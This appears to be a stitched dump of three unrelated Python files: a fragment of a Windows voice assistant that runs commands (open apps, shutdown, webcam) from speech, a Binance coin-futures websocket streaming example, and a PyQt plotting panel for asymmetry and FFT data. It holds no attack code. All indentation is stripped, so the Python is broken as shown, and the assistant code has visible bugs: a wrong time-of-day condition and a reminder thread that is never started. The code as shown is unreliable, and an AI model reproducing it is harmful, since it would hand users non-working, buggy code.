command = ""
try:
with sr.Microphone() as source:
voice = listener.listen(source, phrase_time_limit=4)
command = listener.recognize_google(voice)
print(f"User Said: {command}")
print(" ")
except sr.WaitTimeoutError:
pass
except sr.UnknownValueError:
pass
except sr.RequestError:
print("Network error.")
return command.lower()
@functools.lru_cache()
def wish(self, hour):
if hour > 0 and hour < 12:
self.speak('Good Morning')
elif hour > 12 and hour > 15:
self.speak('Good Afternoon')
else:
self.speak('Good Evening')
def Analyze(self):
query = self.takecommand().lower()
if query == "open notepad":
os.system("notepad")
elif "what is the time" in query:
min = datetime.datetime.now().strftime("%I:%M %p")
self.speak(f"It is {min}")
elif 'browser' in query:
self.speak("opening Browser ")
webbrowser.open("https://www.google.com")
elif 'open cmd' in query or 'open command prompt' in query:
self.speak('Opening CMD')
os.system("start cmd")
elif 'open camera' in query:
self.capture = cv2.VideoCapture(0)
while True:
ret, img = self.capture.read()
cv2.imshow('Camera', img)
k = cv2.waitKey(27)
if k == 27:
break
elif 'close camera' in query:
self.capture.release()
self.capture.destroyAllWindows()
elif 'ip address' in query:
ip = requests.get('https://api.ipify.org').text
self.speak(f"your ip is {ip}")
elif 'wikipedia' in query:
self.speak('Searching Wikipedia')
import wikipedia
query = query.replace('wikipedia', '')
results = wikipedia.summary(query, sentences=3)
self.speak('Accoding to wikipedia'+results)
elif 'open youtube' in query:
self.speak("Opening Youtube")
webbrowser.open('www.youtube.com')
elif 'open stack overflow' in query:
self.speak("Opening Stackoverflow")
webbrowser.open('www.stackoverflow.com')
elif 'search' in query:
self.speak("Searching The Internet")
search = query.replace("search", "")
webbrowser.open(f'www.google.com/search?q={search}')
elif 'i am going' in query:
self.speak(
"ok i will open ..security camera. to secure your device")
Security_Cam()
elif 'open' in query.lower():
query = query.replace("open", "")
query = query.replace("chrome", "")
self.speak(f"Opening {query} ")
Webopener.webopen(query=query)
elif "weather" in query:
from Feature import Weather
w = Weather()
self.speak(w)
elif 'how' in query:
import pywikihow
how = pywikihow.search_wikihow(query, max_results=1)
assert len(how) == 1
self.speak(how[0].summary)
elif 'shutdown' in query or 'shut down' in query:
self.speak('Shutting Down Windows')
os.system("shutdown /s /t 00")
elif 'switch the window' in query:
self.speak("I'll switch the window for you")
pyautogui.hotkey("Alt", "Tab")
elif 'take a screenshot' in query:
self.speak("taking screenshot buddy")
pyautogui.hotkey("Win", "prtsc")
elif "volume up" in query:
pyautogui.press("volumeup")
elif "volume down" in query:
pyautogui.press("volumedown")
elif "remind me" in query:
import threading
self.speak("What should i remind you for")
name = self.takecommand()
self.speak("When Should I Remind You")
time = self.takecommand()
from Feature import Reminder
tt = time
tt = tt.replace(".", "")
tt = tt.upper()
h = threading.Thread(target=lambda: Reminder(tt, name))
elif "play" in query:
import pywhatkit
query = query.replace("play", "")
self.speak(f"Playing {query}")
pywhatkit.playonyt(query)
elif "note" in query:
Takenote()
elif "alarm" in query:
self.speak(
"Sir Please Tell Me The Time to set alarm. For Example, Set Alarm to 5:30 A.M")
tt = self.takecommand()
tt = tt.replace("set alarm to ", "")
tt = tt.replace(".", "")
tt = tt.upper()
import threading
m = threading.Thread(target=lambda: Alarm(tt)).start()
elif "timer" in query:
import threading
query = query.replace("set a timer for ", "")
query = query.replace("minutes", "")
query = query.replace("minute", "")
t = threading.Thread(target=lambda: Timer(int(query))).start()
else:
pass
Hover = HoverAssist()
Hover.wish(hour=hour)
Hover.listen()
|
example_binance_coin_futures.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_binance_coin_futures.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# Thanks to M3tz3l https://github.com/M3tz3l for sharing this example!
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
logging.getLogger("unicorn_binance_websocket_api")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
# create instance of BinanceWebSocketApiManager for Binance.com Futures
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com-coin_futures")
# set api key and secret for userData stream
binance_api_key = ""
binance_api_secret = ""
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"],
["!userData"],
api_key=binance_api_key,
api_secret=binance_api_secret)
bookticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!bookTicker"])
# https://binance-docs.github.io/apidocs/delivery/en/#mark-price-of-all-symbols-of-a-pair
stream_id = binance_websocket_api_manager.create_stream(["markPrice@1s"], "btcusd", stream_label="BTCUSD@arr@1s")
symbols = {'btcusd_perp', 'ethusd_perp', 'bnbusd_perp'}
pairs = {'btcusd', 'ethusd', 'bnbusd'}
binance_websocket_api_manager.create_stream(["aggTrade"], symbols)
binance_websocket_api_manager.create_stream(["markPrice"], pairs)
binance_websocket_api_manager.create_stream(["markPriceKline_1m"], symbols)
binance_websocket_api_manager.create_stream(["indexPriceKline_5m"], symbols)
binance_websocket_api_manager.create_stream(["depth5@100ms"], symbols)
binance_websocket_api_manager.create_stream(["depth10"], symbols)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# show an overview
while True:
binance_websocket_api_manager.print_summary()
time.sleep(1)
|
plottingpanel.py
|
import threading
import warnings
import logging
import functools
import re
import darkdetect
from PyQt5 import QtGui, QtWidgets, QtCore
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
import matplotlib.pyplot as plt
import numpy as np
from app.resources import resources
from app.gui.dialogs.dialog_misc import WarningMessageDialog, PromptWithOptionsDialog
from app.gui.dialogs.dialog_plot_file import PlotFileDialog
from app.gui.dialogs.dialog_integrations import IntegrationDialog
from app.gui.gui import Panel, PanelPresenter
from app.model import files, objects, services
from app.util import qt_widgets, qt_constants
class PlottingPanel(Panel, QtWidgets.QWidget):
class SupportPanel(QtWidgets.QDockWidget):
class PlotStyleBox(qt_widgets.CollapsibleBox):
def __init__(self) -> None:
self.title = 'Plot Style'
super().__init__(self.title)
self.all_color_options = QtWidgets.QComboBox()
self.linestyle_options = QtWidgets.QComboBox()
self.fit_linestyle_options = QtWidgets.QComboBox()
self.line_color_options = QtWidgets.QComboBox()
self.fit_color_options = QtWidgets.QComboBox()
self.line_width_options = QtWidgets.QComboBox()
self.marker_options = QtWidgets.QComboBox()
self.marker_color_options = QtWidgets.QComboBox()
self.marker_size_options = QtWidgets.QComboBox()
self.fillstyle_options = QtWidgets.QComboBox()
self.errorbar_style_options = QtWidgets.QComboBox()
self.errorbar_color_options = QtWidgets.QComboBox()
self.errorbar_width_options = QtWidgets.QComboBox()
self._set_tooltips()
self.all_color_options.addItems(services.StyleService.color_options_values.keys())
self.fit_color_options.addItems(services.StyleService.color_options_extra_values.keys())
self.linestyle_options.addItems(services.StyleService.linestyle_options_values.keys())
self.fit_linestyle_options.addItems(services.StyleService.linestyle_options_values.keys())
self.line_color_options.addItems(services.StyleService.color_options_extra_values.keys())
self.line_width_options.addItems(services.StyleService.line_width_options_values.keys())
self.marker_options.addItems(services.StyleService.marker_options_values.keys())
self.marker_color_options.addItems(services.StyleService.color_options_extra_values.keys())
self.marker_size_options.addItems(services.StyleService.marker_size_options_values.keys())
self.fillstyle_options.addItems(services.StyleService.fillstyle_options_values.keys())
self.errorbar_style_options.addItems(services.StyleService.errorbar_styles_values.keys())
self.errorbar_color_options.addItems(services.StyleService.color_options_extra_values.keys())
self.errorbar_width_options.addItems(services.StyleService.errorbar_width_values.keys())
layout = QtWidgets.QGridLayout()
layout.addWidget(QtWidgets.QLabel("Default Color"), 0, 0)
layout.addWidget(self.all_color_options, 0, 1)
layout.addWidget(QtWidgets.QLabel("Linestyle"), 1, 0)
layout.addWidget(self.linestyle_options, 1, 1)
layout.addWidget(QtWidgets.QLabel("Line Width"), 3, 0)
layout.addWidget(self.line_width_options, 3, 1)
layout.addWidget(QtWidgets.QLabel("Marker Style"), 4, 0)
layout.addWidget(self.marker_options, 4, 1)
layout.addWidget(QtWidgets.QLabel("Marker Color"), 5, 0)
layout.addWidget(self.marker_color_options, 5, 1)
layout.addWidget(QtWidgets.QLabel("Marker Size"), 6, 0)
layout.addWidget(self.marker_size_options, 6, 1)
layout.addWidget(QtWidgets.QLabel("Fillstyle"), 7, 0)
layout.addWidget(self.fillstyle_options, 7, 1)
layout.addWidget(QtWidgets.QLabel("Errorbar Style"), 8, 0)
layout.addWidget(self.errorbar_style_options, 8, 1)
layout.addWidget(QtWidgets.QLabel("Errorbar Color"), 9, 0)
layout.addWidget(self.errorbar_color_options, 9, 1)
layout.addWidget(QtWidgets.QLabel("Errorbar Width"), 10, 0)
layout.addWidget(self.errorbar_width_options, 10, 1)
layout.addWidget(QtWidgets.QLabel("Fit Line Color"), 11, 0)
layout.addWidget(self.fit_color_options, 11, 1)
layout.addWidget(QtWidgets.QLabel("Fit Linestyle"), 12, 0)
layout.addWidget(self.fit_linestyle_options, 12, 1)
box_layout = QtWidgets.QHBoxLayout()
box_layout.addLayout(layout)
self.setContentLayout(box_layout)
def _set_tooltips(self):
self.all_color_options.setToolTip("Specify the color for all components of plot for all selected runs")
self.linestyle_options.setToolTip("Specify the style of the plot line for all selected runs")
self.fit_linestyle_options.setToolTip("Specify the style of the fit line for all selected runs")
self.line_color_options.setToolTip("Specify the color of the plot line for all selected runs")
self.fit_color_options.setToolTip("Specify the color of the fit line for all selected runs")
self.line_width_options.setToolTip("Specify the width of the plot line for all selected runs")
self.marker_options.setToolTip("Specify the style of the plot markers for all selected runs")
self.marker_color_options.setToolTip("Specify the color of the plot markers for all selected runs")
self.marker_size_options.setToolTip("Specify the size of the plot markers for all selected runs")
self.fillstyle_options.setToolTip("Specify the fill style of the plot markers for all selected runs")
self.errorbar_style_options.setToolTip("Specify the style of the error bars for all selected runs")
self.errorbar_color_options.setToolTip("Specify the color of the error bars for all selected runs")
self.errorbar_width_options.setToolTip("Specify the width of the error bars for all selected runs")
class AsymmetryParametersBox(qt_widgets.CollapsibleBox):
def __init__(self) -> None:
self.title = 'Asymmetry Parameters'
super().__init__(self.title)
self.alpha_input = QtWidgets.QLineEdit()
self.alpha_input.setToolTip("Specify the alpha value for the selected asymmetries to be corrected with")
layout = QtWidgets.QGridLayout()
layout.addWidget(QtWidgets.QLabel("Alpha"), 0, 0)
layout.addWidget(self.alpha_input, 0, 1)
self.setContentLayout(layout)
class LegendBox(qt_widgets.CollapsibleBox):
def __init__(self) -> None:
self.title = 'Legend'
super().__init__(self.title)
self.legend_list = qt_widgets.ListWidget()
self.__values = {}
box_layout = QtWidgets.QHBoxLayout()
box_layout.addWidget(self.legend_list)
self.setContentLayout(box_layout)
def set_legend(self, values: dict):
if self.__values == values:
return
self.__values = values
self.legend_list.clear()
for run_id, (label, color) in values.items():
qlabel = QtWidgets.QLineEdit()
qlabel.setText(label)
pixmap = QtGui.QPixmap(100, 100)
pixmap.fill(QtGui.QColor(color))
qicon = QtGui.QIcon(pixmap)
qcolor = QtWidgets.QToolButton()
qcolor.setIcon(qicon)
file_item = qt_widgets.IdentifiableListWidgetItem(run_id, label, self.legend_list)
file_item.setIcon(qicon)
# TODO Since we have to set the color as a toolbutton anyways, it would be pretty cool if the user could press it and have
# a color picker pop up to change the color for that particular run.
# TODO We need to make it so we can edit the title, this will involve changing the logic quite a bit though in a few places.
# maybe we can go back to our old idea of attaching references to model objects to things like this... OR we just keep a dict
# in this class that references the actual titles to the ones the user has selected. It would have to be persistent for when
# they clear and plot again. I don't imagine we would want to save these values. OR we could have them choose what they want in
# the legend (like select temp or field or material or title). I like that idea, maybe put the options up at the top of the
# collapsible box.
# file_item.setFlags(file_item.flags() | QtCore.Qt.ItemIsEditable)
def set_blank(self):
self.__values = {}
self.legend_list.clear()
class Tree(QtWidgets.QTreeWidget):
def __init__(self):
super().__init__()
self.__manager = PlottingPanel.SupportPanel.TreeManager(self)
self.setHeaderHidden(True)
self.setContextMenuPolicy(qt_constants.CustomContextMenu)
self.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.setHorizontalScrollBarPolicy(qt_constants.ScrollBarAsNeeded)
self.header().setMinimumSectionSize(600)
self.header().setDefaultSectionSize(900)
self.header().setStretchLastSection(False)
self._set_callbacks()
def _set_callbacks(self):
self.customContextMenuRequested.connect(self._launch_menu)
def _launch_menu(self, point):
index = self.indexAt(point)
if not index.isValid():
return
item = self.itemAt(point)
actions = item.get_actions()
menu = QtWidgets.QMenu()
for action in actions:
menu.addAction(action[0], functools.partial(action[1], self.selectedItems(), self))
menu.exec_(self.mapToGlobal(point))
def set_tree(self, tree):
self.clear()
self.addTopLevelItems(tree)
def _action_toggle_all_selected(self, new_check_state):
for item in self.selectedItems():
item.setCheckState(0, new_check_state)
def get_run_ids(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.Checked)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.id)
iterator += 1
return ids
def get_checked(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.Checked)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.id)
iterator += 1
return ids
def get_selected(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.Selected)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.id)
iterator += 1
return ids
def get_selected_names(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self, QtWidgets.QTreeWidgetItemIterator.Checked)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.meta[files.TITLE_KEY])
iterator += 1
return ids
def get_names(self):
# noinspection PyTypeChecker
iterator = QtWidgets.QTreeWidgetItemIterator(self)
ids = []
while iterator.value():
if isinstance(iterator.value().model, objects.RunDataset):
ids.append(iterator.value().model.meta[files.TITLE_KEY])
iterator += 1
return ids
def set_all_checked(self, checked):
for i in range(self.topLevelItemCount()):
self.topLevelItem(i).setCheckState(0, checked)
def set_checked_by_ids(self, ids):
# noinspection PyTypeChecker
for i in range(self.topLevelItemCount()):
if self.topLevelItem(i).model.id in ids:
self.topLevelItem(i).setCheckState(0, qt_constants.Checked)
class TreeManager(PanelPresenter):
def __init__(self, view):
super().__init__(view)
self.__view = view
self.__logger = logging.getLogger(__name__)
self.__run_service = services.RunService()
self.__fit_service = services.FitService()
self.__file_service = services.FileService()
self.__run_service.signals.added.connect(self.update)
self.__run_service.signals.loaded.connect(self.update)
self.__run_service.signals.changed.connect(self.update)
def _create_tree_model(self, run_datasets):
run_nodes = []
for dataset in run_datasets:
run_nodes.append(PlottingPanel.SupportPanel.RunNode(dataset))
return run_nodes
@QtCore.pyqtSlot()
def update(self):
ids = self.__view.get_run_ids()
run_datasets = self.__run_service.get_loaded_runs()
tree = self._create_tree_model(run_datasets)
self.__view.set_tree(tree)
self.__view.set_checked_by_ids(ids)
class RunNode(QtWidgets.QTreeWidgetItem):
def __init__(self, run_data):
super(PlottingPanel.SupportPanel.RunNode, self).__init__([run_data.meta[files.TITLE_KEY]])
self.model = run_data
self.__selected_items = None
self.setFlags(self.flags()
| qt_constants.ItemIsUserCheckable)
self.setCheckState(0, qt_constants.Unchecked)
def menu(self, items):
self.__selected_items = items
menu = QtWidgets.QMenu()
# menu.addAction("Plot", self._action_plot)
# menu.addAction("Save", self._action_save)
menu.addAction("Integrate", self._action_integrate)
return menu
def get_actions(self):
actions = [
("Integrate", self._action_integrate)
]
return actions
def _action_integrate(self, items, parent):
ids = [i.model.id for i in items]
if not len(ids): # This shouldn't happen but may as well check. PyQt5 can have glitches.
WarningMessageDialog.launch(["No runs were selected to integrate."])
return
else:
example_meta = items[0].model.meta
sort_keys = [files.TEMPERATURE_KEY, files.FIELD_KEY, files.RUN_NUMBER_KEY]
sort_key_index = PromptWithOptionsDialog.launch(message="Choose the independent variable for the integration",
options=sort_keys)
if 0 > sort_key_index >= len(sort_keys): # Cancelled the prompt.
return
else:
sort_key = sort_keys[sort_key_index]
if sort_key != files.RUN_NUMBER_KEY:
try:
unit = re.search(r'[a-zA-Z]+\b', example_meta[sort_key])[0]
except (IndexError, TypeError):
unit = ""
try:
integrations = services.RunService().integrate_asymmetries(ids, sort_key)
except Exception as e:
WarningMessageDialog.launch([str(e)])
return
else:
bin_sizes = [
items[0].model.asymmetries[objects.RunDataset.LEFT_BINNED_ASYMMETRY].bin_size,
items[0].model.asymmetries[objects.RunDataset.RIGHT_BINNED_ASYMMETRY].bin_size
]
integration_left = integrations[objects.RunDataset.LEFT_BINNED_ASYMMETRY]
integration_right = integrations[objects.RunDataset.RIGHT_BINNED_ASYMMETRY]
independent_variable = integrations[sort_key]
IntegrationDialog.launch(x_axis=independent_variable,
x_axis_label='Run Number' if sort_key == files.RUN_NUMBER_KEY else f'{sort_key} ({unit})',
integrations=[integration_left, integration_right],
titles=[f'For Binned Asymmetries ({b}ns)' for b in bin_sizes])
def _action_save(self):
pass
def _action_plot(self):
pass
def __init__(self):
super().__init__()
self.setTitleBarWidget(QtWidgets.QWidget())
self.setWindowTitle("Plotting")
self.plot_button = qt_widgets.StyleOneButton("Plot")
self.plot_all_button = qt_widgets.StyleOneButton("Plot All")
self.clear_all_button = qt_widgets.StyleTwoButton("Clear All")
self.item_tree = self.Tree()
self.legend_box = self.LegendBox()
self.plot_style_box = self.PlotStyleBox()
self.asymmetry_param_box = self.AsymmetryParametersBox()
self._set_widget_tooltips()
self._set_widget_dimensions()
self._set_widget_attributes()
self._set_widget_layout()
def _set_widget_tooltips(self):
self.plot_button.setToolTip('Plot selected files')
self.plot_all_button.setToolTip('Plot all files')
self.clear_all_button.setToolTip('Clear all files')
def _set_widget_dimensions(self):
pass
def _set_widget_attributes(self):
self.legend_box.toggle_button.pressed.connect(lambda: self._toggle_boxes(self.legend_box.title))
self.plot_style_box.toggle_button.pressed.connect(lambda: self._toggle_boxes(self.plot_style_box.title))
self.asymmetry_param_box.toggle_button.pressed.connect(
lambda: self._toggle_boxes(self.asymmetry_param_box.title))
self.legend_box.on_pressed()
def _set_widget_layout(self):
hbox = QtWidgets.QHBoxLayout()
hbox.addWidget(self.plot_button)
hbox.addWidget(self.plot_all_button)
hbox.addWidget(self.clear_all_button)
vbox = QtWidgets.QVBoxLayout()
vbox.addLayout(hbox)
vbox.addWidget(self.item_tree)
vbox.addWidget(self.legend_box)
vbox.addWidget(self.plot_style_box)
vbox.addWidget(self.asymmetry_param_box)
vbox.addStretch()
temp = QtWidgets.QWidget()
temp.setLayout(vbox)
self.setWidget(temp)
def _toggle_boxes(self, box_id):
if box_id != self.legend_box.title and self.legend_box.is_open():
self.legend_box.on_pressed()
elif box_id != self.plot_style_box.title and self.plot_style_box.is_open():
self.plot_style_box.on_pressed()
elif box_id != self.asymmetry_param_box.title and self.asymmetry_param_box.is_open():
self.asymmetry_param_box.on_pressed()
if box_id == self.legend_box.title:
self.legend_box.on_pressed()
elif box_id == self.plot_style_box.title:
self.plot_style_box.on_pressed()
elif box_id == self.asymmetry_param_box.title:
self.asymmetry_param_box.on_pressed()
def set_first_selected(self):
if self.item_tree.topLevelItemCount() > 0:
self.item_tree.setCurrentItem(self.item_tree.topLevelItem(0))
def _check_add_star(self, box, remove=False):
for i in range(box.count()):
if box.itemText(i) == "*":
if remove:
box.removeItem(i)
return
else:
if not remove:
box.addItem("*")
def set_alpha(self, alpha):
self.asymmetry_param_box.alpha_input.setText(alpha)
def set_default_color(self, color):
if color == "*":
self._check_add_star(self.plot_style_box.all_color_options, False)
else:
self._check_add_star(self.plot_style_box.all_color_options, True)
self.plot_style_box.all_color_options.setCurrentText(color)
def set_linestyle(self, linestyle):
if linestyle == "*":
self._check_add_star(self.plot_style_box.linestyle_options, False)
else:
self._check_add_star(self.plot_style_box.linestyle_options, True)
self.plot_style_box.linestyle_options.setCurrentText(linestyle)
def set_line_color(self, line_color):
if line_color == "*":
self._check_add_star(self.plot_style_box.line_color_options, False)
else:
self._check_add_star(self.plot_style_box.line_color_options, True)
self.plot_style_box.line_color_options.setCurrentText(line_color)
def set_line_width(self, line_width):
if line_width == "*":
self._check_add_star(self.plot_style_box.line_width_options, False)
else:
self._check_add_star(self.plot_style_box.line_width_options, True)
self.plot_style_box.line_width_options.setCurrentText(line_width)
def set_marker(self, marker):
if marker == "*":
self._check_add_star(self.plot_style_box.marker_options, False)
else:
self._check_add_star(self.plot_style_box.marker_options, True)
self.plot_style_box.marker_options.setCurrentText(marker)
def set_marker_color(self, color):
if color == "*":
self._check_add_star(self.plot_style_box.marker_color_options, False)
else:
self._check_add_star(self.plot_style_box.marker_color_options, True)
self.plot_style_box.marker_color_options.setCurrentText(color)
def set_fit_color(self, color):
if color == "*":
self._check_add_star(self.plot_style_box.fit_color_options, False)
else:
self._check_add_star(self.plot_style_box.fit_color_options, True)
self.plot_style_box.fit_color_options.setCurrentText(color)
def set_marker_size(self, size):
if size == "*":
self._check_add_star(self.plot_style_box.marker_size_options, False)
else:
self._check_add_star(self.plot_style_box.marker_size_options, True)
self.plot_style_box.marker_size_options.setCurrentText(size)
def set_fillstyle(self, fillstyle):
if fillstyle == "*":
self._check_add_star(self.plot_style_box.fillstyle_options, False)
else:
self._check_add_star(self.plot_style_box.fillstyle_options, True)
self.plot_style_box.fillstyle_options.setCurrentText(fillstyle)
def set_errorbar_style(self, style):
if style == "*":
self._check_add_star(self.plot_style_box.errorbar_style_options, False)
else:
self._check_add_star(self.plot_style_box.errorbar_style_options, True)
self.plot_style_box.errorbar_style_options.setCurrentText(style)
def set_errorbar_color(self, color):
if color == "*":
self._check_add_star(self.plot_style_box.errorbar_color_options, False)
else:
self._check_add_star(self.plot_style_box.errorbar_color_options, True)
self.plot_style_box.errorbar_color_options.setCurrentText(color)
def set_errorbar_width(self, width):
if width == "*":
self._check_add_star(self.plot_style_box.errorbar_width_options, False)
else:
self._check_add_star(self.plot_style_box.errorbar_width_options, True)
self.plot_style_box.errorbar_width_options.setCurrentText(width)
class PlotDisplay(FigureCanvas):
def __init__(self, settings):
self.__system_service = services.SystemService()
self._draw_pending = True
self._is_drawing = True
self._settings = settings
FigureCanvas.__init__(self, plt.figure())
axes = self.figure.subplots(2, 1, gridspec_kw={'height_ratios': [2, 1]})
self.axes_time = axes[0]
self.axes_freq = axes[1]
self._style = self.set_stylesheet()
self.set_blank()
def set_stylesheet(self):
style = self.__system_service.get_theme_preference()
if style == self.__system_service.Themes.DEFAULT:
if darkdetect.isDark():
style = self.__system_service.Themes.DARK
else:
style = self.__system_service.Themes.LIGHT
if style == self.__system_service.Themes.DARK:
self.figure.set_facecolor(resources.DARK_COLOR)
self.axes_freq.set_facecolor(resources.DARK_COLOR)
self.axes_time.set_facecolor(resources.DARK_COLOR)
elif style == self.__system_service.Themes.LIGHT:
self.figure.set_facecolor(resources.LIGHT_COLOR)
self.axes_freq.set_facecolor(resources.LIGHT_COLOR)
self.axes_time.set_facecolor(resources.LIGHT_COLOR)
self.axes_time.figure.canvas.draw()
self._style = style
return style
def set_blank(self):
tick_color = resources.LIGHT_COLOR
if self._style == self.__system_service.Themes.DARK:
tick_color = resources.DARK_COLOR
title_font_size = 12
self.axes_time.spines['right'].set_visible(False)
self.axes_time.spines['top'].set_visible(False)
self.axes_time.spines['left'].set_visible(False)
self.axes_time.spines['bottom'].set_visible(False)
self.axes_time.tick_params(axis='x', colors=tick_color)
self.axes_time.tick_params(axis='y', colors=tick_color)
self.axes_freq.spines['right'].set_visible(False)
self.axes_freq.spines['top'].set_visible(False)
self.axes_freq.spines['left'].set_visible(False)
self.axes_freq.spines['bottom'].set_visible(False)
self.axes_freq.set_title("Load '.msr', '.dat' or '.asy' files and press 'Plot' to see data.",
fontsize=title_font_size)
self.axes_freq.title.set_color("#c0c0c0")
self.axes_freq.tick_params(axis='x', colors=tick_color)
self.axes_freq.tick_params(axis='y', colors=tick_color)
self.axes_time.figure.canvas.draw()
def set_style(self):
tick_color = resources.DARK_COLOR
if self._style == self.__system_service.Themes.DARK:
tick_color = resources.LIGHT_COLOR
self.axes_time.tick_params(axis='x', colors=tick_color)
self.axes_time.tick_params(axis='y', colors=tick_color)
self.axes_time.spines['left'].set_color(tick_color)
self.axes_time.spines['bottom'].set_color(tick_color)
self.axes_freq.tick_params(axis='x', colors=tick_color)
self.axes_freq.tick_params(axis='y', colors=tick_color)
self.axes_freq.spines['left'].set_color(tick_color)
self.axes_freq.spines['bottom'].set_color(tick_color)
title_font_size = 12
self.axes_time.spines['right'].set_visible(False)
self.axes_time.spines['top'].set_visible(False)
self.axes_time.spines['left'].set_visible(True)
self.axes_time.spines['bottom'].set_visible(True)
self.axes_time.set_xlabel("Time (" + chr(956) + "s)", fontsize=title_font_size)
self.axes_time.set_ylabel("Asymmetry", fontsize=title_font_size)
self.axes_time.xaxis.label.set_color(tick_color)
self.axes_time.yaxis.label.set_color(tick_color)
self.axes_freq.spines['right'].set_visible(False)
self.axes_freq.spines['top'].set_visible(False)
self.axes_freq.spines['left'].set_visible(True)
self.axes_freq.spines['bottom'].set_visible(True)
self.axes_freq.set_xlabel(r'Frequency (MHz)', fontsize=title_font_size)
self.axes_freq.set_ylabel(r'FFT$^2$', fontsize=title_font_size)
self.axes_freq.ticklabel_format(style='sci', axis='y', scilimits=(0, 0))
self.axes_freq.xaxis.label.set_color(tick_color)
self.axes_freq.yaxis.label.set_color(tick_color)
self.axes_time.figure.canvas.draw()
self.figure.tight_layout()
def plot_asymmetry(self, time, asymmetry, uncertainty, fit, color, marker_color, line_color, errorbar_color,
fit_color, linestyle, marker, errorbar_style, fillstyle, line_width, marker_size,
errorbar_width,
fit_linestyle):
marker_color = color if marker_color == 'Default' else marker_color
line_color = color if line_color == 'Default' else line_color
errorbar_color = color if errorbar_color == 'Default' else errorbar_color
marker_face_color = marker_color if fillstyle != 'none' else 'none'
fit_color = color if fit_color == 'Default' else fit_color
if uncertainty is not None and errorbar_style != 'none':
self.axes_time.errorbar(time, asymmetry, uncertainty, mfc=marker_face_color, mec=marker_color,
color=color, linestyle=linestyle, marker=marker, fillstyle=fillstyle,
linewidth=line_width, markersize=marker_size,
elinewidth=errorbar_width,
ecolor=errorbar_color, capsize=errorbar_style)
else:
self.axes_time.plot(time, asymmetry, mfc=marker_face_color, mec=marker_color, color=color,
linestyle=linestyle, marker=marker, fillstyle=fillstyle,
linewidth=line_width,
markersize=marker_size)
if fit is not None:
self.axes_time.plot(time, fit, color=fit_color, linestyle=fit_linestyle,
marker='None')
def plot_fft(self, frequencies, fft, color, label):
self.axes_freq.plot(frequencies, fft, color=color, label=label)
def set_asymmetry_plot_limits(self, max_asymmetry, min_asymmetry):
if not self._settings.is_asymmetry_auto():
try:
y_min = self._settings.get_min_asymmetry()
y_max = self._settings.get_max_asymmetry()
except ValueError:
WarningMessageDialog.launch(["Invalid asymmetry limits."])
return
self.axes_time.set_ylim(y_min, y_max)
else:
y_min = min_asymmetry - abs(min_asymmetry * 0.1)
y_max = max_asymmetry + abs(max_asymmetry * 0.1)
self.axes_time.set_ylim(y_min, y_max)
self._settings.set_min_asymmetry(y_min)
self._settings.set_max_asymmetry(y_max)
def set_fft_plot_limits(self, max_fft, max_freq=None):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.axes_freq.set_ylim(0, max_fft * 1.1)
if not self._settings.is_freq_auto():
try:
x_min = self._settings.get_min_freq()
x_max = self._settings.get_max_freq()
except ValueError:
WarningMessageDialog.launch(["Invalid frequency limits."])
return
self.axes_freq.set_xlim(x_min, x_max)
else:
self._settings.set_min_freq(0)
self._settings.set_max_freq(max_freq)
def finish_plotting(self):
self.set_style()
self.axes_time.figure.canvas.draw()
def start_plotting(self):
self.axes_time.clear()
self.axes_freq.clear()
